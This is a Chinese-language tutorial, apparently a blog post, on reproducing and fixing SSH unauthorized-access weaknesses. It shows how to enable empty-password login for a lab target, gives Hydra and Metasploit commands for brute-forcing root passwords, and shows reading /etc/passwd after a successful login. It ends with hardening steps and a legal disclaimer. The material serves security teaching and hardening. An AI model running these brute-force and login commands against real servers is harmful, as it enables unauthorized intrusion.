ssh未授权漏洞复现

SSH未授权漏洞复现指南

SSH未授权漏洞原理

SSH（Secure Shell）协议用于远程管理服务器，但若配置不当（如允许空密码登录、弱密码、未限制访问IP等），攻击者可绕过身份验证直接访问服务器，导致未授权访问漏洞。常见场景包括：

1. 空密码登录：SSH服务允许用户以空密码登录。
2. 弱口令爆破：攻击者通过字典爆破获取SSH账户密码。
3. 默认配置风险：部分系统默认开启SSH且未限制权限。

漏洞复现步骤

1. 环境搭建

• 漏洞环境：使用存在配置问题的Linux系统（如Ubuntu 18.04 + OpenSSH 7.6）。

• 修改SSH配置：

  # 编辑SSH配置文件  
  sudo vi /etc/ssh/sshd_config  
  
  # 允许空密码登录（复现漏洞关键）  
  PermitEmptyPasswords yes  
  PasswordAuthentication yes  
  
  # 重启SSH服务  
  sudo systemctl restart ssh  

2. 漏洞利用方法

• 空密码直接登录：

  # 尝试以空密码登录目标服务器  
  ssh username@target_ip  
  # 若提示输入密码时直接回车即可登录，漏洞存在。  

• 弱口令爆破（Hydra工具）：

  # 使用Hydra爆破SSH密码  
  hydra -l root -P password_list.txt ssh://target_ip  
  # -l：指定用户名  
  # -P：指定密码字典  

• 自动化利用（Metasploit）：

  # 启动Metasploit  
  msfconsole  
  
  # 搜索SSH模块  
  search ssh_login  
  
  # 配置参数  
  use auxiliary/scanner/ssh/ssh_login  
  set RHOSTS target_ip  
  set USERNAME root  
  set PASS_FILE password_list.txt  
  run  

3. 验证漏洞

若成功登录目标服务器，可执行任意命令（如查看系统信息）：

whoami     # 查看当前用户  
cat /etc/passwd  # 查看系统账户  

漏洞修复方案

1. 禁用空密码登录：

   # 修改SSH配置文件  
   PermitEmptyPasswords no  

2. 关闭密码认证，启用密钥登录：

   PasswordAuthentication no  
   PubkeyAuthentication yes  

3. 限制SSH访问IP：

   # 仅允许特定IP访问  
   echo "sshd: 192.168.1.100" >> /etc/hosts.allow  
   echo "sshd: ALL" >> /etc/hosts.deny  

4. 设置强密码策略：

   • 密码长度≥12位，包含大小写字母、数字、特殊符号。

5. 更新SSH服务版本：

   sudo apt update && sudo apt upgrade openssh-server  

SEO关键词整合

SSH未授权访问漏洞复现、SSH空密码登录漏洞、Hydra爆破SSH密码、Metasploit SSH漏洞利用、SSH安全配置修复、禁用SSH密码认证、SSH密钥登录设置、Linux服务器安全加固

通过以上步骤，可完整复现SSH未授权漏洞并实施修复。实际操作中需遵守法律法规，仅用于授权测试环境！